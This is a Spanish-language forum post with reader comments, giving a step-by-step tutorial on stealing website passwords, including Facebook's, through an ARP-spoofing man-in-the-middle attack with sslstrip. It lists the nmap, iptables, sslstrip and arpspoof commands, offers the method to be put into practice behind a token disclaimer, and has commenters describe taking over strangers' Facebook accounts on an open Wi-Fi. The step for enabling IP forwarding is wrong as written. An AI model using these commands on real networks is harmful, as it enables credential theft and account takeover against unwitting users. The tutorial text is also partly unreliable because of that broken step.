Sacando Passwords de Manera silenciosa

Sacando Passwords de Manera silenciosa

Aviso:

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Definiciones de Conceptos utilizados:

Antes que nada veamos algunas pequeñas definiciones de ciertos temas y conceptos necesarios para la comprencion del post.

SSL:

Su acronimo significa Secure Sockets Layer (capas de enchufes seguros) el cual es un protocolo que es utilizado para crear conexiones seguras de servidor a cliente en http y https encriptando los datos de los usuarios que navengan por internet por medio de certificados digitales RSA proporcionados por la empresa Verising .

Ataques Man in the middle

Es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado.

SSLSTRIP

Es una herramienta que nos permite suplantar los certificados de ssl y redireccionar el trafico de http y https hacia nuestro equipo para ver datos como logins y passwords cifrados por ssl en paginas web.

Herramientas necesarias.

*nmap: podemos obtenerlo haciendo click AQUÌ ó instalarlo con Código:
sudo apt-get install nmap

*Dsniff: Obtenlo AQUÌ ó Código: sudo apt-get install dsniff

Python y dependencias de él para sslstrip: por lo general las distros de linux ya traen python solo queda instalar las dependencias con Código: sudo apt-get install python-twisted-web

Y si no tienen python Código: sudo apt-get install python

*Sslstrip Lo descargamos de AQUÌ
lo descomprimimos y tipeamos en la consolapara instalarlo ya con el directorio de la carpeta d sslstrip :
Código: sudo python ./setup.py install

Bien!

Paso 1: checamos nuestra ip y mapeamos la red con nmap para identificar el router y la victima:
chekamos la ip con Código: ifconfig

Ubuntu

Mapeamos la red con rango 0-255 para que capture todas las maquinas presentes en la red:

Código: sudo nmap -PN 192.168.0.0-255

Facebook

Paso 2: Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward

Y para comprobar que esta activado "1" ponemos en la consola:

cat /proc/sys/net/ipv4/ip_forward=1

Veamos

Linux

Paso 3 : Redireccionamos el trafico de http y https a un puerto a la escucha con:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

passwords

Paso 4: Ponemos en marcha el sslstrip con: sudo sslstrip -w HxC - l 8080

Nota: -w aqui va el nombre con que quieren que se guarde el log del sslstrip y -l es para que escuche el trafico del puerto al cual redireccionamos el trafico de http

Paso 5 Hacemos un envenenamiento de arp o arpspoof con: arpspoof -i interface de red (wlan0 o etho) -t ip victima ip del router

vean:

Sacando Passwords de Manera silenciosa

en mi caso la ip victima es 192.168.0.2 y la del router es 192.168.0.1

Ahora solo queda esperar a que alguen caiga

miren:

aqui en la maquina virtual con win xp estamos entrando en Facebook

Ubuntu

y luego que ya entramos a FB

Facebook

Vean que registra el sslstrip en el archivo de texto que crea por default:

Linux

Ahora comentamos un enlace de alguien miren:

passwords

Y sslstrip hace de las suyas y nos muestra tambien el comentario que realizamos:

Sacando Passwords de Manera silenciosa

Como pueden ver con Sslstrip podemos obtener passwords sin levantar sospechas como lo hariamos con ettercap por si solo, y tambien podemos ver lo que publicamos en enlaces etc etc ... asi que ponganlo en practica pero tomando en cuenta no dañar la integridad de alguien mas pues no deceariamos que nos hicieran algo asi a nosotros


Para cualquier duda queja o lo que sea, diganmelo por los cometarios.

No aclaro dudas por MP, las dudas de uno pueden ser las dudas de muchos.



Saludos

Ubuntu

Facebook

Fuentes de Información - Sacando Passwords de Manera silenciosa

El contenido del post es de mi autoría, y/o, es un recopilación de distintas fuentes.

Dar puntos
1.418 Puntos
Votos: 233 - T!score: 6.5/10
  • 56 Seguidores
  • 22.928 Visitas
  • 809 Favoritos

Comentarios Destacados

@8MoCoSo7 Hace más de 2 años +251
nohaynadalibre dijo:
...fines educativos y éticos...


Dame un ejemplo

Mostrar lo peligroso que puede ser conectarse desde las redes wifi públicas





Linux

99 comentarios - Sacando Passwords de Manera silenciosa

@exiliadomn Hace más de 2 años +1
+10 favoritos
@jorcj Hace más de 2 años +2
buen post y buen wallpaper, ¿tenes mas wallpapers de ese tipo?
@nohaynadalibre Hace más de 2 años +47
...fines educativos y éticos...


Dame un ejemplo
@barxacova Hace más de 2 años +1
Buen post
@Elmaese_22 Hace más de 2 años +2
Y si usas https?
@taringa_exe Hace más de 2 años +2
exiliadomn dijo:+10 favoritos
@facmax09999 Hace más de 2 años +26
No entendí bien la película ¿en que parte saco el password?
@azavenom Hace más de 2 años
insulting dijo:
exiliadomn dijo:+10 favoritos


Gracias amigo Sacando Passwords de Manera silenciosa
@jorcj Hace más de 2 años +6
insulting dijo:
jorcj dijo:buen post y buen wallpaper, ¿tenes mas wallpapers de ese tipo?


Gracias bro y si tengo un pack hd de ese tipo


hacete un post de wall entonces jejeje el unico que tengo de aliens y predator.Ubuntu


http://www.subetelo.us/images/58150971724026146213.jpg
@Edward9Hack9 Hace más de 2 años +3
+5 ubuntu rules (:
@8MoCoSo7 Hace más de 2 años +251
nohaynadalibre dijo:
...fines educativos y éticos...


Dame un ejemplo

Mostrar lo peligroso que puede ser conectarse desde las redes wifi públicas





Linux
@chronicopra Hace más de 2 años +1
eso lo trae el backtrck5 en exploits
@Lailo Hace más de 2 años +7
mirá yo no entiendo un carajo de esto, pero creo q te falta un paso cuando decis: "Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward "
el comando cat es pára mostrar por pantalla un archivo de texto.....


repito: es una acotación desde mi ignorancia eh! por ahi estoy diciendo una pavada.
@Lailo Hace más de 2 años +3
Lailo dijo:mirá yo no entiendo un carajo de esto, pero creo q te falta un paso cuando decis: "Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward "
el comando cat es pára mostrar por pantalla un archivo de texto.....


repito: es una acotación desde mi ignorancia eh! por ahi estoy diciendo una pavada.


Lailo dijo:mirá yo no entiendo un carajo de esto, pero creo q te falta un paso cuando decis: "Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward "
el comando cat es pára mostrar por pantalla un archivo de texto.....


repito: es una acotación desde mi ignorancia eh! por ahi estoy diciendo una pavada.



me retracto.
el paso está en la imagen.
@Laylaaa Hace más de 2 años +1
@8MoCoSo7 Hace más de 2 años +19
Que fácil es esto che
Abri mi red wireless y la deje sin contraseña y espere hasta que entre alguien, entraron 2 en cuestión de minutos
y es muy loco xq los 2 lo primero que hicieron fue abrir su facebook así que por robar internet ahroa les abro su face y les escribo que son unos boludos por usar mi wifi
@esteban22x Hace más de 2 años
he intentado hacer esto varias veces con un equipo con windows 7 desde ubuntu 11.10 y fedora 16, y nada, tal vez porque me reconoce mi tarjeta de red como una de ethernet, eth1, pero instalo el driver de b43 de broadcom para que la detecte como wlan0 , todo bien, en fedora probé esto, y se me hace una confusión grande, porque se sabe que al hacer el mapeo en nmap va a resultar, por ej si hay 2 equipos
ip 1 -> router
ip2 -> equipo atacante
ip3 -> equipo victima
.......
perdona la ignorancia pero como saber cual es la ip del router y cual el de la victima sin tener acceso fisico a la pc de la victima
@azavenom Hace más de 2 años
esteban22x dijo:he intentado hacer esto varias veces con un equipo con windows 7 desde ubuntu 11.10 y fedora 16, y nada, tal vez porque me reconoce mi tarjeta de red como una de ethernet, eth1, pero instalo el driver de b43 de broadcom para que la detecte como wlan0 , todo bien, en fedora probé esto, y se me hace una confusión grande, porque se sabe que al hacer el mapeo en nmap va a resultar, por ej si hay 2 equipos
ip 1 -> router
ip2 -> equipo atacante
ip3 -> equipo victima
.......
perdona la ignorancia pero como saber cual es la ip del router y cual el de la victima sin tener acceso fisico a la pc de la victima


tengo la misma pregunta
@8MoCoSo7 Hace más de 2 años +2
@esteban22x la del router por lo general (depende de la configuración que se le haya setteado a la red del router) va a ser la primera dentro del rango de direcciones que te tire.

por ejemplo si nmap te da que hay 3 equipos:
192.168.1.1
192.168.1.5
192.168.1.76
entonces podemos deducir que 192.168.1.1 es la ip del router y la de la victima va a ser la ip que no sea la tuya. Para esa haces un ifconfig y ves cual es tu IP (Ej: 192.168.1.76) ey por descarte la 192.168.1.5 será la de la victima.

No ea demás aclarar que este método es válido cuando tanto la víctima como el atacante estarán en la misma red ¬¬'
@RStone Hace más de 2 años -2
Estaría bueno que dejes el trasfondo de por qué funciona esto. Buen post!
@esteban22x Hace más de 2 años
8MoCoSo7 dijo:@esteban22x la del router por lo general (depende de la configuración que se le haya setteado a la red del router) va a ser la primera dentro del rango de direcciones que te tire.

por ejemplo si nmap te da que hay 3 equipos:
192.168.1.1
192.168.1.5
192.168.1.76
entonces podemos deducir que 192.168.1.1 es la ip del router y la de la victima va a ser la ip que no sea la tuya. Para esa haces un ifconfig y ves cual es tu IP (Ej: 192.168.1.76) ey por descarte la 192.168.1.5 será la de la victima.

No ea demás aclarar que este método es válido cuando tanto la víctima como el atacante estarán en la misma red ¬¬'

no hace falta aclarar, en mi casa tengo un router con wi-fi, aunque con contraseña, vienen muchas personas en la tarde y me piden internet.
@juancba555 Hace más de 2 años +19
Aviso: Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Facebook
@Av-non-ZM Hace más de 2 años -26
Keyloggers...

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Educativos ?
Alguien normal ve eso y lee la explicación y queda así
Linux

No explicas un sorete . Tampoco es algo ético , es algo beneficioso para vos , pero malo para el otro .
Osea que no es ético.
No te pueden culpar por haber hecho eso, si vos lo pusiste y los otros lo hacen , es culpa de los otros.
Es re copy & paste esa frase , en todos los lados esta , y vieras su sentido , no la pondrias.
@Cluor Hace más de 2 años +14
Av-non-ZM dijo:Keyloggers...

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Educativos ?
Alguien normal ve eso y lee la explicación y queda así
passwords

No explicas un sorete . Tampoco es algo ético , es algo beneficioso para vos , pero malo para el otro .
Osea que no es ético.
No te pueden culpar por haber hecho eso, si vos lo pusiste y los otros lo hacen , es culpa de los otros.
Es re copy & paste esa frase , en todos los lados esta , y vieras su sentido , no la pondrias.


naaa tranquilo amigo muchos lo intentaran, pocos lo lograran. Si me dieran un peso por cada sujeto que me dice q intento robar una contraseña y fracaso ya tendria el carro que quiero,
@8MoCoSo7 Hace más de 2 años +7
Con fines educativos puede ser bien fundamentado debido a que por medio de este post muchos pueden darse cuenta lo vulnerables que son al conectarse con sus notebooks, netbooks, celulars, etc. en lugares públicos o más aún los que se creen hackers porque descifran las claves WEP al vecino y usan internet conectándose a esa red con la clave que hackearon

Con fines éticos tal vez es más complejo de explicar, o por lo menos para mí, pero tranquilamente puede ser que el posteador implementó esta técnica para sniffear la red y hacerse de los datos de las cuentas y luego expone la vulnerabilidad que logró encontrar para generar un poco de conciencia.


En fin, solamente traté de decir por donde veo que estos son fines educativos y éticos.
@LioBino Hace más de 2 años
Esta genial... Alguna idea para saber la dirección ip de un usario en facebook?
@cuervo2784 Hace más de 2 años +1
insulting dijo:
jorcj dijo:buen post y buen wallpaper, ¿tenes mas wallpapers de ese tipo?


Gracias bro y si tengo un pack hd de ese tipo

yo tambien lo quiero..

chronicopra dijo:eso lo trae el backtrck5 en exploits

como lo hago
8MoCoSo7 dijo:Con fines educativos puede ser bien fundamentado debido a que por medio de este post muchos pueden darse cuenta lo vulnerables que son al conectarse con sus notebooks, netbooks, celulars, etc. en lugares públicos o más aún los que se creen hackers porque descifran las claves WEP al vecino y usan internet conectándose a esa red con la clave que hackearon

Con fines éticos tal vez es más complejo de explicar, o por lo menos para mí, pero tranquilamente puede ser que el posteador implementó esta técnica para sniffear la red y hacerse de los datos de las cuentas y luego expone la vulnerabilidad que logró encontrar para generar un poco de conciencia.


En fin, solamente traté de decir por donde veo que estos son fines educativos y éticos.

muy cierto y te apollo...
@Av-non-ZM Hace más de 2 años -4
Cluor dijo:
Av-non-ZM dijo:Keyloggers...

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Educativos ?
Alguien normal ve eso y lee la explicación y queda así
Sacando Passwords de Manera silenciosa

No explicas un sorete . Tampoco es algo ético , es algo beneficioso para vos , pero malo para el otro .
Osea que no es ético.
No te pueden culpar por haber hecho eso, si vos lo pusiste y los otros lo hacen , es culpa de los otros.
Es re copy & paste esa frase , en todos los lados esta , y vieras su sentido , no la pondrias.


naaa tranquilo amigo muchos lo intentaran, pocos lo lograran. Si me dieran un peso por cada sujeto que me dice q intento robar una contraseña y fracaso ya tendria el carro que quiero,

Yo solo se responder la pregunta de seguridad del correo o facebook y tener keylogger en mi pc. ( Es lo unico que se , y lo unico que alguna vez me funciono )
@8MoCoSo7 Hace más de 2 años
Av-non-ZM dijo:
Cluor dijo:
Av-non-ZM dijo:Keyloggers...

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Educativos ?
Alguien normal ve eso y lee la explicación y queda así
Ubuntu

No explicas un sorete . Tampoco es algo ético , es algo beneficioso para vos , pero malo para el otro .
Osea que no es ético.
No te pueden culpar por haber hecho eso, si vos lo pusiste y los otros lo hacen , es culpa de los otros.
Es re copy & paste esa frase , en todos los lados esta , y vieras su sentido , no la pondrias.


naaa tranquilo amigo muchos lo intentaran, pocos lo lograran. Si me dieran un peso por cada sujeto que me dice q intento robar una contraseña y fracaso ya tendria el carro que quiero,

Yo solo se responder la pregunta de seguridad del correo o facebook y tener keylogger en mi pc. ( Es lo unico que se , y lo unico que alguna vez me funciono )

en realidad con esto que se muestra en este post podes hacerte un script que cumpla la función del keylogger en cuanto a datos como WebSite/Usuario/contaseña y eso ya es algo No Ético, lo que pasa que tal vez vos no conozcas mucho de ética por eso te cuesta encontrarla en cosas así como lo que se cuenta acá
@getra21 Hace más de 2 años -17
pero solo se puede usar en Laniux?
@lgrv_94 Hace más de 2 años +1
Gracias capo, espero que la tarjeta de red me sirva para hacer eso.
@8MoCoSo7 Hace más de 2 años +21
getra21 dijo:pero solo se puede usar en Laniux?

No, en Linux nomas
@hsilencio83 Hace más de 2 años +1
buen trabajo van mis +10
@thjthurj6kuke Hace más de 2 años +1
Realmente bueno, hacia tiempo que quería hacer un post de esta temática y te has adelantado a lo grande, buen post
@TonyHawk Hace más de 2 años +6
nohaynadalibre dijo:
...fines educativos y éticos...


Dame un ejemplo


borrarle la cuenta a un pedófilo. ¿cuenta como ejemplo?
@PulmonPinchado Hace más de 2 años +1
no entendi un carajo , que es ? osea como es esto ? podes chorear un facebook desde cualquier lado o desde un tipo que se conecta a tu wifi ?
@weramone Hace más de 2 años +2
+8 buen post!
@8MoCoSo7 Hace más de 2 años +3
PulmonPinchado dijo:no entendi un carajo , que es ? osea como es esto ? podes chorear un facebook desde cualquier lado o desde un tipo que se conecta a tu wifi ?

...................... LEE EL POST!!!

No es para chorearle el facebook a nadie, es con fines educativos y éticos

Pero el método es para aplicarlo dentro de la misma red donde se encuentren conectados, o sea tu wifi y el que se conecte, o vos el wifi que te conectes para citar como ejemplo en tu pregunta ¬¬'
@facmax09999 Hace más de 2 años +4
Pero en que parte saco el password!! nadie me respondio
@Numero33 Hace más de 2 años +2
Es increible pero lei el post como si lo estuviera leyendo en voz baja jajajajajaja
@-MiniMi- Hace más de 2 años +1
esto se puede hacer solo cuando alguien se conecta a tu propia red wifi? =o
@Dunno033 Hace más de 2 años -1
Numero33 dijo:Es increible pero lei el post como si lo estuviera leyendo en voz baja jajajajajaja



@Juampi92 Hace más de 2 años +1
insulting dijo:
Elmaese_22 dijo:Y si usas https?


Fijate amigo que es por eso que me gusta sslstrip ya que puede suplantar sitios con https como facebook es por eso que se puede obtener passwords de FB

entonces hay alguna forma de evitar ataques de este tipo cuando te logueas en cuentas públicas?
@77Metalero77 Hace más de 2 años -2
Facebook]
@dynamickurugane Hace más de 2 años
si tan solo se pudiera hacer en opensuse
@cyblokip Hace más de 2 años -2
Lo acabo de probar , la pc víctima sólo podía acceder a fb , ninguna otra página cargaba.
Es común?
No sé si tenga que ver , pero la pc víctima está conectada vía ethernet.